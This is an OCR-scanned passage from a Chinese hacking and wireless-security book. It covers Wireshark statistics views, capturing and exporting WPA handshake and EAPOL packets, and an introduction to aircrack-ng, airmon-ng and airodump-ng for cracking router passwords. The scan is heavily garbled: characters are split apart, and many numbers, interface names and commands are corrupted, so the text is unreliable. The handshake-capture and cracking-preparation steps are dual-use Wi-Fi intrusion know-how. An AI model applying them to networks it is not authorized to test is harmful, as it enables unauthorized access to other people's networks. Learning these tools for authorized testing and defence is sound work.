示 。 其 中 错误 信息 会 以 红色 进行 标注 ， 警 
告 信息 以 黄色 进行 标注 ， 注 意 信 息 以 浅 蓝 
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色 进 行 标注 ， 正 常 通信 以 深蓝 色 进行 标注 ， 每 一 种 类 型 会 单独 列 出 一 行进 行 显示 ， 通 过 专 
家 信息 可 以 更 直观 地 查看 数据 通信 中 存在 哪些 问题 。 


Wireshark . 专家 信息 .tcp.pcapng © 


Severity * Summary 
上 


Group 协议 计数 


显示 过 滤器 ; “tcp,stream eq 0” 


显示 过 滤器 的 限制 。” Vj 按 岳 要 分 组 。 搜索 : | ] 
| 加 Hetp | XClose | 


虹 尖 了 阳 7.3.2 ”统计 数据 包 

和 通过 对 数据 包 的 统计 分 析 ， 可 以 查看 更 为 详细 的 数据 信息 ， 进 而 分 析 网 络 中 是 否 存在 
安全 问题 。 查 看 数据 包 统计 信息 的 操作 步 又 如 下 : 

[sep 国 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “捕获 文件 属性 ”菜单 命令 ， 打 开 “ 捕 

获 文件 属性 ”对 话 框 ， 在 其 中 可 以 查看 文件 、 事 件 、 捕 获 、 接 口 等 信息 ， 如 下 图 所 示 。 


Wireshark ,捕获 文件 属性 .tcp.pcapng 号 日 日 

细节 

文件 

名 称 : lroot/Downloads/tcp.pcapng 

长 度 : 1,070 kB 

格式 : Wiresharkl... - pcapng 

封装 : Ethernet 

时 间 

第 一 个 分 组 : 2018-10-10 21:43:23 

最 后 分 组 : 2018-10-10 21:45:39 

经 过 时 间 ]: 00:02:16 

捕获 

硬件 : AMD Phenom(tm) I| X6 1090T Processor 

Os: Linux 4.18.0-xalil -amd64 

应 用 : Dumpcap [Wireshark) 2.6.3 [Git v2.6.3 packaged as 2.6.3-1) 
接口 

接口 去 弃 分 组 捕获 过 滤器 链 路 类 型 分 组 大 小 限制 

wlan0 0 (0 %) 无 Ethernet 262144 字 节 
钴 计 Ee 

捕获 文件 描述 
| Hep || 刷新 | 复制 到 剪贴 板 Qi 保存 注释 


BE 国 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “协议 分 级 ”菜单 命令 ， 打 开 “ 协 
议 分 级 统计 ”对 话 框 ， 如 下 图 所 示 。 从 这 里 可 以 统计 出 每 一 种 协议 在 整个 数据 包 中 的 占 
有 率 。 
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第 7 章 ”无 线 网 络 的 安全 分 析 工具 


Wireshark -协议 分 级 统计 -tcp.Pcapng © 
协议 * 扶 分 组 百分比 分 组 技 字 节 百 分 比 字 节 比特 / 秘 End packet End Bytes End Bits/s 
“Frame 100.0 3315 100.0 955542 56K 0 0 0 
- Ethemet 1000 3315 二 8B 46410 2723 0 0 0 
r Internet Protocol Version 6 0d 2 0.0 80 4 0 D 0 
INternet Control Message Protocolv6 0,] 之 0.0 56 3 2 56 3 
” Internet Protocol Version 4 99.8 3310 6.9 66200 3,885 0 0 0 
~ Usar Datagram Protocol 11.0 361 0,3 2912 170 0 0 0 
Network TIme Protocol D2 7 0.0 336 19 了 336 19 
Domain Name System 10.8 357 了 25531 1,498 357 25531 1.498 
* Transmission Control Protocol 88,8 2943 85.2 816601 47k 2455 504163 35k 
Secure SocKets Layer 10,5 349 19.2 183994 lOk 338 155749 9,14] 
Malformed Packet 12 39 0.0 0 0 39 0 0 
- Hypertext Transfer Protocol 3.3 109 20.2 193408 1lk 83 52196 3,650 
Online Certificate Statys Protocol 02 6 0.l 1l266 74 6 1265 74 
Media Type 0.2 7 4.5 42683 2,505 7 45574 2,674 
Line based text data 0.4 13 15.3 116915 8,622 13 808141 1.714 
Darta 0,] 2 0,3 2692 157 2 2692 157 
Internet Control Message Protocol 0,1 3 0.0 316 18 3 316 18 
Address Resolution Protocol 0,1 3 0.0 81 1 3 81 站 
4 
于 只 元 过 过 二 
加 Hetp 复制 -|| xclose | 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “对 话 ” 菜 单 命令 ， 打 开 下 图 所 示 
gre 其 中 包括 以 太 网 、IPv4、IPv6、TCP、UDP 等 不 同 协 议会 话 信息 展示 。 


Wireshark . Conversations , tcp.pcapng ©@@ 

Ethernet .3 IPv4:30 | IPvY6:1 TCP:121 UDP.127 
Address A 7 AddressB Packets Bytes packetsA > 日 Bytes A3B Packets B >A Bytes B 3 A Rel Start Duration Bits/s A SB 
33:33:00:00:00:16 es8'4e"06:28:ae'46 2 180 0 0 2 180 57.976722 0.9841 
e8-4e:06:28-ae:46 14:83:cd-33-60:73 3310 958 k 1805 177k 1,505 780k 0.000000 136.3053 
f4:83:cd:33-B0-73 tft-ff:ff-ft-ff 3 128 3 126 0D 0 7284020 B80.0039 

解析 名 称 时 示 过 波 器 的 限制 纺 对 开始 时 间 Conversation 党 型 - 
回 Hetp 复 币 -~ | 其 Close | 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “端点 ” 


本 “端点 ”对 话 框 ， 其 中 包含 以 太 网 和 各 种 协议 选项 。 


菜单 命令 ， 打 开 下 图 所 示 


Wireshark . Endpoints .tcp.pcapng 日 四 
Ethcrnct-4 | IPv4.31 IPv6:2 | TCP:145 UDP.133 

Address 7 Packets Bytes Tx Packets Tx Bytes Rx Packets Rx Bytes 
33:33:00:00:00:16 2 180 0 0 2 180 
e8:4e:06:28:ae:46 3,312 958« 1,807 178 k 1505 780k 
f4:83:cd:33:60:73 3,313 958 «x 1,508 780k 1,805 177k 
ff:ff:ff:ff:ff:ff 3 126 0 0 3 126 

解析 名 称 显示 过 滤器 的 限制 Endpoint 类 型 ~ 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “分 组 长 度 


所 pp “分 组 长 度 ” 对 话 框 。i 


度 ” 菜 单 命令 ， 打 开 下 图 
这 里 可 以 对 不 同 大 小 数据 包 进 行 统计 。 


Wireshark . Packet Lengths .tcp.pcapng @@Q 


Topic | ltem ^ Count Average Min val Max val Rate (ms) Percent Burst rate Burst start 

~ Packet Lengths 3315 289.15 42 1514 0.0243 100% 1.6200 134.305 
0-19 0 - - - 0.0000 0.00% - - 
20-39 0 - - - 0.0000 0.00% - - 
40-79 2122 63.50 42 79 0.0156 64.01% 1.4500 134.342 
80-159 372 105.34 80 159 0.0027 11.22% 0.1200 77.159 
160-319 150 213.17 160 312 0.0011 4.52% 0.0500 131.903 
320-639 173 479.33 323 625 0.0013 5.22% 0.0600 90.234 
640-1279 108 867.93 640 1270 0.0008 3.26% 0.0400 65.397 
1280-2559 390 1476.87 1306 1514 0.0029 11.76% 0.1400 131.015 
2560-5119 0 - - - 0.0000 0.00% - - 
5120 and greater 0 - - - 0.0000 0.00% - - 

显示 过 滤器 : Entera display filter .… 应 用 

复制 另存 为 .… 其 Close 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “IO 图 表 ” 菜 单 命 令 ， 打 开 下 图 所 
和 “IO 图 表 ” 对 话 框 ， 其 中 包括 一 个 坐标 轴 显 示 的 图 表 ， 下 方 可 以 添加 任意 的 协议 ， 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


也 可 以 选择 协议 显示 的 颜色 ， 还 可 以 调整 坐标 轴 的 刻度 。 


Wireshark ,10 图表 ,tcp.pcapng @O@ 


Wireshark IO 图 表 : tcp.pcapng 


Packets 作 秒 


时 间 ( 秒 ) 
点 去 往 戏 分 组 3018 (131s = 70) 
Enabled Graph Name Displav Filter Color Style Y Axis Y Field SMA Period 
v 所 有 分 组 贺 Line Packets None 


TCP 错误 tcp.analysis... 


| -| 由 | 属 标 公 拖 搜 二 缩放 间隔 ] 秒 一 天 时 神 对 数 刻度 复位 | 


加 Hetp 复制 || % Close | DisaveAs_ | 


step 加 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “流量 图 ”菜单 命令 ， 打 开 下 图 所 
示 的 “流量 图 ”对 话 框 ， 其 中 包括 通信 时 间 、 通 信 地 址 、 端 口 以 及 通信 过 程 中 的 协议 功 
能 ， 非 常 清晰 明了 。 


Wireshark .让 ,tcp.pcapng ©@ee 


192.168.0,110 143.204.135.6% 
时 间 80 739 178 19 ' 


2018-10-10 21.43;24,203564244 
2018-10-10 21:43:;25.154626306 
2018-10-10 21:.43:25.220232780 
2018 10 10 21;43;25.743965404 
2018-10-10 21,43;26,287053877 
2018-10-10 21:43:26,287072961 
2018-10-10 21.43:26.287075843 
2018-10-10 21.43:26.330718250 
2018-10-10 21:43:26.355297507 


a 
5 太 碟 2943 填 目 


显示 过 滤器 的 限制 壤 类 到 ; TCP Flows 地 址 ， 任何 ~ 
复位 
四 Hetp | 其 Close | QiSave As. 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “TCP 流 型 图 ”菜单 命令 ， 打 开 下 
图 所 示 的 对 话 框 。 在 其 中 可 以 根据 实际 需要 设置 相应 的 显示 ， 还 可 以 切换 数据 包 的 方向 。 


吞吐 量 对 于 192.168.0.110:44786 > 80.239.178.19:80 (MA) @ 


吞吐 量 对 于 192.168.0.110:44786 > 80.239.178.19:80 (MA) 


tcp.pcapng 
， 2.4 > 
16 3 
一 1 De 
-= 个 
吕 0 0.8 = 
wu oo 
2 0 0 点 
5 0 三 
E -08 所 
Lee 
EE 
, 16 部 
oy 
2 -2.4 
0 1.5 3 4.5 6 7.5 9 
Time (s) 
Hover el] 分 组 0 bytes + 3 分 组 ,0 bytes 
类 型 | 知 吐 旺 MA Window(s) |1.000000 了 3 流 1 > 切换 方向 
鼠标 | 时 间 / 序 列 (Stevens) V 段 长 度 V| 吞吐 量 ”| 实际 吞吐 量 复位 


时 间 / 厚 列 (tcptrace) 


| i | 其 Close | DisaveAs.. 


7.4 ”实战 演练 
实战 演练 1 一 一 筛选 出 无 线 通信 中 的 握手 信息 


第 7 章 无线 网 络 的 安全 分 析 工 具 一 


往 选 无 线 通 信 中 握手 信息 可 以 通过 以 下 几 个 步骤 进行 : 
将 网 卡 置 入 monitor 模 式 。 使 用 iw dev wlan0 interface add wlan0mon type monitor 命 令 


将 网 卡 置 入 monitor 模 式 ， 如 下 图 所 示 。 


root@kali:~# iw dev wLang interface add wLangmon type monitor 


root@kali:-~# iwconfig 

wLangomon IEEE 802.11 Mode:Monitor Tx-P 
Retry short long limit:2 RTS 
Power Management:off 


wlan0 IEEE 862.11 ESSID:off/any 
Mode:Managed Access Point: Not 
Retry Short long Limit:2 RTS 
Encryption key:off 
Power Management :off 


lo no wireless extensions. 


et 二 hb no wireless extensions. 


使 用 ifconfig wlan0mon up 命令 ， 将 新 创建 的 无 线 网 卡 启动 ， 如 下 图 所 示 。 


root@kali:~# ifconfig wlandmon up 

root@Kkali:~# ifconfig 

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mt 
inet6 fe80::20c:29ff:fe7f:39f2 prefixlen 64 
ether 900:9c:29:7f:39:f2 txqueuelen 1069 (E 
RX packets 14827 Dytes 20048396 (19.1 MiB) 
RX errors © dropped 6 overruns © frame 0 
TX packets 4945 bytes 311322 (304.0 KiB) 
TX errors D dropped 6 overruns © carrier 0 


lo: flags=73<UP,LODPBACK,RUNNING> mtuyu 65536 
inet 127.0.0.1 netmask 255.0.0.0 
inet6 ::1 prefixlen 128 scopeid 9Xx10<host> 
loop txqueuelen 169606 (Local Loopback ) 
RX packets 164 bytes 8356 (8.1 KiB) 
RX errors 0 dropped 6 overruns © frame 0 
TX packets 164 bytes 8356 (8.1 KiB) 
TX errors © dropped 6 overruns © Carrier 0 


wLangmon: flags=41653<UP,BROADCAST,RUNNING,MULTICAST> 
Unspec E8-4E-866-28-AE-46-09-90-g90-99-96-09-9 
RX packets 102 bytes 151390 (14.7 KiB) 
RX errors © dropped 6 overruns © frame 0 
TX packets 0 bytes 6 (9.9 B) 
TX errors 9 dropped 6 overruns © carrier 0 


ower=20 dBm 
thersolt Fragment thr:off 


-Associated Tx-Power=26 dBm 
thr:off Fragment thr:off 


u 1500 
scopeid Gx20<link> 
thernet) 


collisions 9 


collisions 9 


mtu 1500 
0-60-00-00 txqueuelen 19906 (UNSPEC) 


collisions 0 


启动 Wireshark 抓 包工 具 ， 选 择 wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 


Capture 


Using this filter: | 由 | Enter a capture filter .. 
etho 


any 
Loopback: lo 
nflog 


Learn 


wlanOQOmon es 


在 抓 取 到 的 数据 包 中 筛选 并 标记 出 握手 信息 


数据 包 ， 如 下 图 所 示 。 


Destination Protocol Length Info 
3:b2:a8:f3:a3) (RA) 802 .11 


2 
VivoMobi a8:f3:a3 (988:23: 
3 2 
2 
J 
2 


VivoMobi_a8:f3:a3 (AB8: 


VivoMobi a8:f 
VivoMobi a8:Tf 


Guangdon_43: 


VivoMobi_a8:T13;: (D8: | 

) {RA) 802.11 
VivoMobi a8:f3:a3 (B88:23:b2:a8:f3:a3) (RA) 862.11 
VivoMobi a8: :a3}) { 


VivoMobi ag8 : 
VivoMobi a8:T3: :23:b2:a8:f3:a3] . 
VivoMobi_a8:f3:a3 (98:23:b2:a8:f3:a3) (RA} 802 .11 
VivoMobi_a8:f3:a3 (DR8:23:b2:aa':f3:a3) (RA) 802 .11 
VivoMobi a8: [RA ) 


3 
3 
二 
3 
VivoMobi_a8:f3:a3 (98:23:b2:a8:f3:a3 
3 
3 
3 
3 


16 Request -to-send, Flags=........ 
16 Request -to-send, Fl 

19 ACknowledoement ， 

16 Request -to-Send， 

106 Acknowledgement, agS=.。。,. 。, 。 
10 Acknowledgement, Flags=,...,...., 
16 Request -to-send, Flags=........ 
16 Request-to-send, Flags=........ 
16 Request -to0-send, aa 
18 Acknowledogement, Fl 


16 Request -to-send, Flags=,........ 
16 Request -to-send, Flags=,...,..,., 
16 Request-to-send, Flags= .. 

16 Request -to-send 
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~ 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


选择 “文件 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “ 寻 出 特定 分 组 ”菜单 命令 ， 导 出 
标记 后 的 握手 信息 数据 包 ， 如 下 图 所 示 。 


Wireshark . Export Specified Packets © 
查看 : | /root "| 人 必 4 了 2 | 三 
国 计算 机 名 称 了 | 大 小 闪现 日 期 被 修改 -= 
| root 国 Desktop Folder ”2018/1... 上 午 
训 Documents Folder ”2018/1... 上 年 
冯 Downloads Folder 2018/1.. 上 午 
Music Folder 2018/1.. 上 年 
| Pictures Folder ”2018/1.. 上 午 
里 Public Folder ”2018/1.. 上 午 ~ 
’ 上 
文件 名 称 (N) : ltest| | Sm) | 
©S Cancel 
Export as: Wireshark/tcpdump/... - pcap “| BHelp 
Packet Range Compress with gzip 


Captured ,e Displayed 


All packets 8975 
Selected packets only 1 
®) Marked packets only 6 
First to last marked 13 
Range: D 


实战 演练 2 一 一 快速 定位 身份 验证 信息 数据 包 


通过 Wireshark 抓 取 到 整个 握手 过 程 数据 包 后 ， 用 户 可 以 通过 以 下 步骤 来 快速 定位 ， 精 
确定 位 到 身份 验证 数据 包 。 


通过 Wireshark 打 开 抓 取 到 的 握手 信息 数据 包 ， 如 下 图 所 示 。 
Welcome to Wireshark 


Open 


{root/wap-01.cap (258 KB) 


在 筛选 条 件 文本 框 中 输入 eapol 筛 选 条 件 ， 如 下 图 所 示 。 


Nleapol 四 


No. Time Source Destination tee 站 Info 


+ Frame 997: 237 bytes on wire (1896 bits), 237 bytes captured (1896 bits) 
» IEEE 862.11 QoS Data, Flags: ... F。 

» Logical-Link Control 

» 802.1xX Authentication 


[step 图 单 击 右 侧 的 1 按钮 ， oda ns 


aptured (1896 bits) 


» IEEE 892 .11 QoS DR FT -一 一 让 
» Logical-Link Control 
~ B92,1X Authentication 
version: 98862.1X-2994 {2) 
Type: Key (3) 
Length: 199 
Key Descriptor Type: EAFOL RSN Key (2) 
[Message number: 3] 
» Key Information: 9x13ca 
Key Length: 16 
Replay Counter: 2 
WPA Key Nonce: 56ebe99911f4c4c2a4453355ddd9973f3c96ar3cb8e58df1. , ， 
Key IV: 66DDDB9999999996999969666696BBBBBB 
WPA Key RSC: 6966999999996999699 
WPA Key ID: 69999696600660669069 
WPA Key MIC: d7e1510da4658ffb4a319969fbf5Sy7yecd8 


WPA Key Data Length: 194 
WPA Key Data: a45460445387eeg9g6c765aa3618c150a8e67267a847490970. . 


7.5 小 试 身 手 


练习 1: 使 用 Wireshark 进 行 抓 包 。 
练习 2: 使 用 筛选 器 筛选 出 需要 的 数据 包 。 
练习 3: 如 何 对 数据 包 进 行 标 记 并 导出 这 些 标记 的 数据 包 。 
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牢 8 革 ”无 线路 由 从 的 密码 安全 宁 略 


无 线路 由 器 的 加 密 方式 包括 WEP、WPA 与 WPS 三 种 ， 针 对 不 同 的 方式 ， 玻 解密 码 的 工 


具 以 及 安全 维护 方式 都 不 同 。 


8.1 破解 密码 前 的 准备 工作 


在 开始 破解 密码 之 前 需要 有 一 些 准 备 
工作 ， 这 里 需要 用 户 购 买 一 个 无 线 网 卡 ， 
该 网 卡 需要 适合 kali 虚 拟 机 ， 一 般 atheros 心 
片 的 无 线 网 卡 可 以 安装 在 kali 虚 拟 机 中 ， 不 
过 ， 为 确保 购买 的 网 卡 正确 ， 购 买 前 请 认 
真 询问 是 否 文 持 kali 虚 拟 机 。 


8.1.1 ”查看 网 卡 信息 


无 线 网 卡 购 买 后 ， 下 面 就 可 以 查看 网 
卡 的 信息 了 ， 包 括 网 卡 模式 、 网 卡 信息 、 
网 卡 映射 信息 等 。 具 体操 作 步 骤 如 下 : 
查看 网 卡 模式 。 使 用 iw list 命 令 查看 
网 卡 的 信息 。 下 图 为 执行 效果 。 这 里 显示 
出 来 的 模式 是 该 网 卡 所 支持 的 所 有 模式 。 


Supported interface modes : 
IBSS 

managed 

AP 

AP/VLAN 
monitor 

mesh point 


在 Kali Linux 系 统 命令 界面 中 输入 
ifconfig -a 命令 ， 通 过 这 个 命令 可 以 查看 本 
机 所 有 网 卡 信 息 ， 可 以 看 到 此 时 本 台 计 算 
机 中 没有 无 线 网 卡 ， 如 下 图 所 示 。 


root@kali:-# ifconfig -3 
ethO: flags=4163<UP,BRDOADCAST,RUNNING,MULTICAST> mtu 1588 
inet 192.168.157.131 netmask 255.255.255.8 broadcast 192.168.157.255 
inet6 fe89::20c:29ff:fe39:f29c prefixlen 64 scopeid 6x29<Link> 
ether gB8:9c:29:39:f2:9c txqueuelen 19699 (Ethernet) 
RX packets 5863 bytss 1093293 [1.8 MiB) 
RX errors 0 dropped 8 overruns © frame 68 
TX packets 1246 bytas 100278 (97.9 KiB) 
TX errors 0 dropped BB overruns 0 carrier 0 collisions 0 


其 项 居间 上 项 上 凑 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 
inet 127.9.9.1 netmask 255.6.9.9 
inet6 ::1 prefixlen 128 scopeid 6Dx1L9<host> 
loop txgueuelen 1009 (Local Loopback) 
RX packets 108 byTtes 8944 (5.3 Kis) 
RX errors 9 dropped B overruns 6 frame 6 
TX packets 168 bytes 8544 (8.3 KiB) 
TX errors © dropped 8 overruns © carrier 8 collisions 6 


将 网 卡 映 射 进 虚拟 机 ， 选 择 vmware 


工具 栏 中 的 “虚拟 机 ”菜单 项 ， 在 弹出 
的 菜单 列表 中 选择 “可 移动 设备 ”菜单 
命令 ， 再 从 “可 移动 设备 ”菜单 列表 中 选 
择 相 应 的 无 线 网 卡 并 进行 连接 ， 如 下 图 
所 示 。 


| 由 WUM) 运 项 ET 天 和 OH) | 员 ~ oooec NN Nl™ | 
山 ， 电源 ( 
CD/DVD ID 日 
冤 仓 (U) Onl+Shih+p 。 国 | RS 还 昌 中 
吕 二 六 Ctrl+Alt+Del[E) Android > 
mA na G6 Raink 0211 on WAN > 
本 忌 雪 (NJ sp 
持 区 屏 存 ( 口 Ctd+Akt+prtscn 国 Etetas) 
入 在 IM) 
至 部 去 测 VMware Toocls0T) 
并 设 舍 (S. Cul+D 


二 了 
此 时 会 弹出 一 个 提示 框 ， 询 问 是 否 连 回 由 5 地 


接 USB 设 备 ， 单 击 “ 确 定 ” 按 钮 ， 如 下 图 
所 示 。 


kali-linux-2018.3-vm-amd64 - VMware Workstation XxX 


@ 某 个 USB 设备 将 要 从 主机 找 出 并 连接 到 该 虚拟 机 。 该 设备 将 先 
多 停止 以 实现 安全 移 除 。 对 于 某 些 设 备 ， 主机 可 能 会 显示 消息 现 
在 可 以 安全 地 移 除 设备 。” 


器 不 再 显示 此 消息 (S) 


确定 取消 


再 次 运行 ifeonfig -a 命令 。 这 时 会 多 出 
一 个 wlan 开 头 的 网 卡 ， 这 就 是 无 线 网 卡 ， 
如 下 图 所 示 oO 


root@kali:~# Ifconfig -a 
etho: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtuy 1509 
Inet 192.168.157.131 netmask 255.255.255.8 broadcast 192.168.157.255 
inet6 fe86::20C:29ff:fe39:f29C prefixlen 64 scopeid 9x20<link> 
ether gg:8c:29:39:f2:9c¢ txqueuelen 1999 (Ethernet) 
RX packets 506030 bytes 66929258 [63.8 MiB) 
RX errors 9 dropped 9 overruns 9 frame 6 
TX packets 22877 bytes 1399881 (1.3 MiB) 
TX errors 8@ dropped 6 overruns 9 carrier 9 collisions 6 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 55536 
inet 127.6.9.1 netmask 255.90.B.9 
inet6 ::1 prefixlen 128 scopeid 0x19<host> 
Loop txqueuelen 1699 (Local Loopback) 
RX packels 172 byles 8784 (8.5 KiB) 
RX errors 9 dropped 86 overruns 0 frame 6 
TX packets 172 bytes 8784 (8.5 KiB) 
TX errors 9 dropped 8 overruns 8 carrier 86 collisions 0 


wlang: flags=409B<BROADCAST,MULTICAST> mtuyu 1560 
ether ff2:34:da:cl:78:64 txqueuelen 1680 (Ethernet) 
RX packets 9 bytes 9 [9.8 B) 
RX errors 8 dropped 8 overruns © frame 68 
TX packets 0 bytes 8 (9.8 B) 
TX errors 9 dropped 9 overruns 9 carrier 9 collisions 昌 


使 用 iwconfig 命 令 ， 来 只 显示 无 线 网 
卡 信息 ， 下 图 为 执行 效果 。 


ee 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈 超 值 版 ) 


root@kali:-~# iwconfig 
lo no wireless extensions. 


IwLane IEEE 882.11 ESSID:"TPGuest 6073" 

Mode:Managed Freguency:2.437 GHz Access Point: 86:83:CD:33:60:73 
Bit Rate=1 Mb/s Tx-Power=20 dBm 

Retry short long Mimit:2 RTS thr:off 

Encryption key:off 

Power Management:off 

Link Quality=79/79 Signal level=-17 dBm 
Rx invalid nwid:@ Rx invalid crypt:® Rx invalid frag:0 

Tx excessive retrizs:25 Invalid misc:0 Missed beacon:0 


Fragnent thr:off 


ethe no wireless extensions. 


”step 图 使 用 iw dev wlan0 interface add 
wlan0mon type monitor 命 令 可 以 将 一 个 网 卡 
植 入 混杂 模式 ， 如 下 图 所 示 。 其 中 dev 后 面 
跟 的 是 具体 无 线 网 卡 的 名 称 ， 新 增加 的 网 
卡 名 称 必 须 是 wlan+ 一 个 数字 +mon 形 式 。 
root@kali:-# iw dev wLan9 interface add wLangmon type monitor | 
设置 完成 后 ， 运 行 iwconfig 命 令 ， 查 
看 无 线 网 卡 人 信息， 如 下 图 所 示 。 其 中 会 多 
出 一 个 wlan0mon 无 线 网 卡 ， 并 且 模 式 是 
monitor (混杂 模式 ) 。 


root@kali:-# iw dev wlange interface add wlanomon type monitor 
root@kali:-# iwconfig 
lo no wireless extensions. 


wlangmon IEEE 862.11 Mode:Monitor Tx-Power=2g dBm 
Retry short long limit:2 RTS thr:off 
Power Management :off 


Fragnent thr:off 


wlang IEEE 862.11 ESSID: "TPGUuest 6073" 
Mode:Managed Freguency:2.437 GHz Access Point: 86:83:CD:33:60:73 
Bit Rate=l Mb/s Tx-Power=20 dBm 
Retry Short Long limit:2 RTS thr:off 
Encryption key:off 
Power Management:off 
Link QUuaLiry=yor7e Slignal level=-17 dem 
Rx invalid nwid:g Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:25 Invalid misc:B Missed beacon:0 


Fragnent thr:off 


ethgO no wireless extensions. 


执行 ifconfig wlan0mon up 命令 ， 
新 加 入 的 无 线 网 卡 局 用 ， 再 次 运行 ifconfig 
命令 ， 可 以 看 到 网 卡 列 表 中 已 经 启用 的 
wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 此 时 使 
用 Wireshark 抓 包 软 件 便 可 以 抓 取 802.11 无 线 
通信 协议 数据 包 了 。 


Langmon: flags=4163<UP,BRDADCAST,RUNNING,MULTICAST> mty 1599 

unspec E8-4E-86-28-AE-46-38-3A-80-80-08-00-80-890-98-00 txgueuelen 1068 
(UNSPEC) 

RX packets 2366 bytes 360342 (351.8 KiB) 

RX errors 8 dropped 2308 Overrun5 0 frame 9 

TX packets 9 bytes 9 (9.9 B) 

TX errors B dropped © overruns © carrier © collisions © 


8.2 党 公 人 破解 工具 一 一 aircrack 


aircrack 是 目前 WEP/WPA/WPA2 破 解 领 
域 中 最 热门 的 工具 ，aircrack-ng 套 件 包含 的 
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工具 能 够 捕捉 数据 包 和 握手 包 ， 生 成 通信 数 
据 ， 或 进行 暴力 破解 攻击 以 及 字典 攻击 ， 
该 套件 包含 airmon-ng、aircrack-ng、aire- 
play-ng、airodump-ng、airbase-ng 等 工具 。 


8.2.1 airmon-ng 工 具 


airmon-ng 工 具 属 于 aircrack-ng 套 件 中 的 
一 种 ，airmon-ng 用 来 实现 无 线 接口 在 man- 
aged 和 monitor 模 式 之 间 的 转换 及 清除 干扰 
进程 。 

使 用 airmon-ng 工 具 的 操作 步骤 如 下 : 
运行 airmon-ng 命 令 ， 即 可 查看 无 线 网 
ed 片 信息 ， 如 下 图 所 示 。 


root@kali:~# airmon-ng 


PHY Interface Driver Chipset 


phy1 wlang rt2808usb Ralink Technology, Corp. RT2878/RT3070 


运行 airmon-ng --h 命 令 ， 即 可 查看 
arimon-ng 工 具 的 命令 格式 ， 如 下 图 所 示 。 


root@kali:-# airmon-ng --h 


usage: airmon-ng <start|stop|check> <interface> [channel or frequency] 


运行 airmon-ng check 命 令 ， 即 可 查看 
有 哪些 进程 会 影响 到 aircrack-ng 套 件 的 工 
作 ， 如 下 图 所 示 。 


root@Kkali:~# airmon-ng check 


Found 4 processes that could cause trouble. 

Kill them using 'airmon-ng check kill' before putting 

the card in monitor mode, they will interfere by changing channels 
and sometimes putting the interface back in managed mode 


PID Name 
484 NetworkManager 
569 wpa supplicant 
2736 dhclient 
4492 dhclient 


向 提示 : 查询 完成 后 ， 用 户 可 以 通过 kill 
命令 加 进程 PID 号 终止 相关 进程 ， 但 是 air- 
mon-ng 工 具 提 供 了 一 个 简便 的 方法 ， 就 是 
运行 airmon-ng check kill 命 令 ， 就 可 以 将 干 
扰 进 程 直接 中 断 运 行 。 另 外 ， 为 了 保证 抓 
取 数 据 包 能 顺利 执行 ， 建 议 用 户 执行 service 
停止 网 络 管 
影响 抓 取 数 


network-manager stop 命 令 ， 
理 器 的 运行 ， 因 为 这 个 服务 会 
据 包 。 


当 配 置 完 成 后 ， 运 行 


alrmon-ng start 


wlan0 命 令 ， 将 无 线 网 卡 植 入 混杂 模式 ， 如 
下 图 所 示 。 


roote@kali:-~# airmon-ng start wlane 


Found 2 processes that could cause trouble. 

Kill them using 'airmon-ng check kill' before putting 

the card in monitor mode, they will interfere by changing channels 
and sometimes putting the interface back in managed mode 


PID Name 
569 wpa supplicant 
2736 dhclient 
PHY Interface 


Driver Chipset 


phy4 wLane rt2896uUsb Ralink Technology, Corp. RT2879/RT3870 


(mac89211 monitor mode vif enabled for [phy4]jwlane on [phy4]jwLangmon) 


(mac86211 station mode vif disabled for [phy4]wLang) 


运行 ifconfig 命 令 ， 可 以 查看 网 卡 信 
息 ， 下 图 为 执行 效果 。 


wlanbmon: flags=41563<UP,BROADCAST,RUNNING,MULTICAST> mtu 1566 
unspec E8-4E-66-28-AE-46-36-3A-66-66-66-60-60-68-696-606 txqueuelen 1669 (UNSPEC) 
RX packets 8364 bytes 419616 【469.1 KiB) 
RX errors 8 dropped 8364 overruns DB frame 8 
TX packets 8 bytes 8 (6.0 B) 
TX errors 8 dropped 9 overruns 9 carrier 9@ collisions 9 


多 提示 : 通过 airmon-ng 工 具 可 以 快速 配置 
网 卡 进入 混杂 模式 并 启动 新 加 入 的 无 线 网 
卡 ， 这 个 原理 同 手 动 设置 是 一 样 的 。 


8.2.2 airodump-ng 工 具 


airodump-ng 工 具 是 aircrack-ng 套 件 中 用 
于 抓 取 数据 包 的 工具 。 使 用 airodump-ng 工 
具 的 操作 步骤 如 下 : 
抓 取 网 络 数据 包 。 运 行 airodump-ng 
wlan0mon 命 令 ， 进 入 轮 询 模 式 ， 并 抓 取 网 
络 数据 包 。 下 图 为 抓 取 的 信息 。 其 中 ，CH 
代表 信道 ，airodump-ng 会 从 网 卡 最 小 信道 


到 最 大 信道 循环 抓 取 数据 包 ， 每 间隔 1s 更 换 
一 个 信道 。 


CH 2 ][ Elapsed: 9 s ][ 2918-196-13 96:59 

B55ID PWR Beacons #Data, #/5 CH MB ENC CIPHER AUTH ESSID 
60:2F:09:C3:57:9D -58 2 0 B 13 136 WPA CCMP PSK ChinaNet-DysG 
79:;AF;6A;99:;1E:;:9D -59 1 8 8 13 1386 WPA2 CCMP PSK TP794613852 
38:21:87:66:20:AB -44 2 0 日 7 55 WPA2 CCMP PSK midea ac 8962 
B4:15:13:8C:10:A2 -55 0 2 日 1 -1 OPN <length: 0> 
E4:58:A3:7D:37:92 -43 1 13 8 1 54e. OPN CMCKC -XI] 

BSSID STATION PWR Rate Lost Frames Probe 
